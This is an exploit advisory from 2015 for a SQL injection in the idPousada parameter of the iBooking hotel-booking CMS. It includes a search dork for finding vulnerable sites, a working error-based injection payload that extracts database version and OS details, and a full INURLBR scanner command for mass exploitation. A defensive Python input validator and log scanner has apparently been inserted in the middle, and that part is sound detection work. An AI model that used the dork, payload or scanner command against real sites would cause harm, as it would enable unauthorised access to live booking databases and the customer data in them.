
(0day) IBOOKING CMS - SQL INJECTION

Author: Cleiton Pinheiro, Published: 22-09-2015
# VENDOR:             www.ibooking.com.br
# Vulnerable versions: ALL
# File: filtro_faixa_etaria.php
# Parameter: idPousada(GET)
# DORK: intext:"Desenvolvido por ibooking"
# Reported: 15/10/2015
# ---------------------------------------------------------------------------------
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# EMAIL: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# ---------------------------------------------------------------------------------

# Description
The vulnerable request is issued by a JavaScript function found within /motor-de-reservas.


# JavaScript code responsible for the vulnerable request

$.ajax({
    type: "GET",
    url: "filtro_faixa_etaria.php",
    data: "qtde_quartos=1&idPousada=61",
    success: function(xml){
        $("#filtro_faixa_etaria").html(xml);
    }
});


# Vulnerable URL:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

# POC:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)

# Example:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

# Return print:
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png
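The AJAX call above shows what the endpoint legitimately receives: two small integers, qtde_quartos and idPousada. Anything else in idPousada is either a bug or an injection attempt, which gives a defender a simple rule for both input validation and log review. The following is an added example (not code from the advisory author or from ibooking): it encodes that rule as a server-side integer check, and runs it over a few constructed Common Log Format access-log lines to flag requests to filtro_faixa_etaria.php whose idPousada is not a plain integer. It also recognises the hex literal used by the published payload, 0x203a3a494e55524c42525f56554c4e3a3a20, which decodes to " ::INURLBR_VULN:: " (the marker the scanner's -a option looks for in the response). The log lines, IPs and timestamps are constructed for the example.

```python
"""Defensive check for the filtro_faixa_etaria.php request described in the advisory.

Added example, not part of the original advisory or of the ibooking code base.
Assumes: idPousada and qtde_quartos are always small positive integers (as the
page's own AJAX call sends them), and access logs are in Common Log Format.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hex literal from the published payload; bytes.fromhex shows it is the
# scanner's validation marker " ::INURLBR_VULN:: " wrapped in spaces.
INURLBR_MARKER_HEX = "203a3a494e55524c42525f56554c4e3a3a20"
INURLBR_MARKER = bytes.fromhex(INURLBR_MARKER_HEX).decode("ascii")

# Keywords that should never appear in a parameter that is supposed to be numeric.
SQL_HINT = re.compile(
    r"\b(select|union|and|or|concat|information_schema|floor|rand)\b", re.I
)

# Common Log Format: host ident user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)'
)

# Constructed sample lines (not real traffic). Line 2 carries a fragment of the
# advisory's payload; line 4 carries a single stray quote.
LOG_LINES = [
    '203.0.113.5 - - [15/Sep/2015:18:42:51 -0300] "GET /motor-de-reservas/'
    'filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61 HTTP/1.1" 200 1422',
    '203.0.113.5 - - [15/Sep/2015:18:42:53 -0300] "GET /motor-de-reservas/'
    'filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+COUNT(*),'
    'CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,@@GLOBAL.VERSION)) HTTP/1.1" 500 0',
    '198.51.100.7 - - [15/Sep/2015:18:43:10 -0300] "GET /motor-de-reservas/'
    'index.php HTTP/1.1" 200 8800',
    '198.51.100.7 - - [15/Sep/2015:18:43:12 -0300] "GET /motor-de-reservas/'
    'filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61%27 HTTP/1.1" 500 0',
]


def validate_int_param(raw):
    """Server-side rule: accept only a plain positive integer, else None.

    This is the check the endpoint should apply before the value reaches SQL
    (in PHP terms: cast to int, or bind it as an integer in a prepared statement).
    """
    if raw is None or not re.fullmatch(r"[0-9]{1,9}", raw):
        return None
    value = int(raw)
    return value if value > 0 else None


def classify_request(path):
    """Return a list of findings for one request path+query (empty if benign)."""
    parts = urlsplit(path)
    if not parts.path.endswith("/filtro_faixa_etaria.php"):
        return []
    # parse_qs undoes the '+' and %xx encoding, so we inspect the decoded value.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for key in ("idPousada", "qtde_quartos"):
        values = params.get(key)
        if not values:
            findings.append(f"missing {key}")
            continue
        for value in values:
            if validate_int_param(value) is not None:
                continue  # well-formed integer, nothing to report
            findings.append(f"non-integer {key}={value!r}")
            if "0x" + INURLBR_MARKER_HEX in value.lower():
                findings.append(
                    f"{key} carries the 0x{INURLBR_MARKER_HEX} marker "
                    f"({INURLBR_MARKER.strip()!r})"
                )
            if SQL_HINT.search(value):
                findings.append(f"{key} contains SQL keywords")
    return findings


def scan_access_log(lines):
    """Return one dict per suspicious request: ip, time, status and findings."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip rather than guess
        ip, ts, _method, path, status, _size = m.groups()
        findings = classify_request(path)
        if findings:
            hits.append({"ip": ip, "time": ts, "status": int(status), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(LOG_LINES):
        print(hit["ip"], hit["time"], hit["status"], "; ".join(hit["findings"]))
```

The same integer rule does double duty: applied at the endpoint it removes the injection point, and applied to logs it surfaces past attempts, including scanner runs whose payload embeds the hex marker. A 500 status next to a flagged request is a useful secondary signal that the injected SQL actually reached the database.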


# Mass exploration using scanner INURLBR
# Download: https://github.com/googleinurl/SCANNER-INURLBR

# COMMAND
# SETTING DORK DE PESQUISA
--dork 'YOU_DORK'
# USE --dork 'intext:"Desenvolvido por ibooking"'

# SETTING OUTPUT FILE:
# USE -s 'ibooking.txt'

# SETTING STRING EXPLOIT GET:
--exploit-get 'EXPLOIT_GET'
# USE --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

# SETTING TYPE OF VALIDATION:
# USE -t 3
The third type combines the first and second types; it also connects to the target with the exploit string through the GET method.
The string set in the --exploit-get parameter is injected directly into the URL:
Example: --exploit-get '/index.php?id=1&file=conect.php'
URL after injection: http://www.target.br/index.php?id=1&file=conect.php

# SETTING STRING OF VALIDATION:
Specifies the string used to validate the response:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If the given string is found in the target's response, the target is considered vulnerable.
- USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal form inside the exploit-get string.

# COMMAND FULL:
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN'

# MORE INFORMATION:
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html


+--------------------------------------------------------------------------------------+
| | | G R 3 3 T S | | |
+--------------------------------------------------------------------------------------+
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z
* Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira
